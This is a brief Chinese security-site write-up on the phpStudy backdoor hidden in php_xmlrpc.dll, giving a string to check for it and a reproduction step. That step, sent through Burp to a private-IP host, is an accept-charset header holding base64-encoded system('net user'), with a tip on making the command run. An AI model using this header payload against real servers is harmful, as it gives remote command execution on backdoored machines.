| 关联规则 | 关联知识 | 关联工具 | 关联文档 | 关联抓包 |
| 参考1(官网) | |
| 参考2 | |
| 参考3 |
[SAFE-ID: JIWO-2024-2515] 作者: future 发表于: [2019-12-05]
本文共 [652] 位读者顶过
phpstudy介绍
Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache、PHP、MySQL、phpMyAdmin不同版本软件于一身,一次性安装无需配置即可直接使用,具有PHP环境调试和PHP开发功能。
影响版本
后门验证
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll存在@eval(%s('%s'));即说明有后门。
漏洞复现
访问:http://192.168.52.148,用burpsuit进行抓包拦截:
在请求头里添加accept-charset: c3lzdGVtKCduZXQgdXNlcicpOw==
其中,c3lzdGVtKCduZXQgdXNlcicpOw== 为system('net user');的base64编码转换;
注意:要把gzip, deflate里逗号后面的空格去掉,不然命令执行不成功。
[出自:jiwo.org]
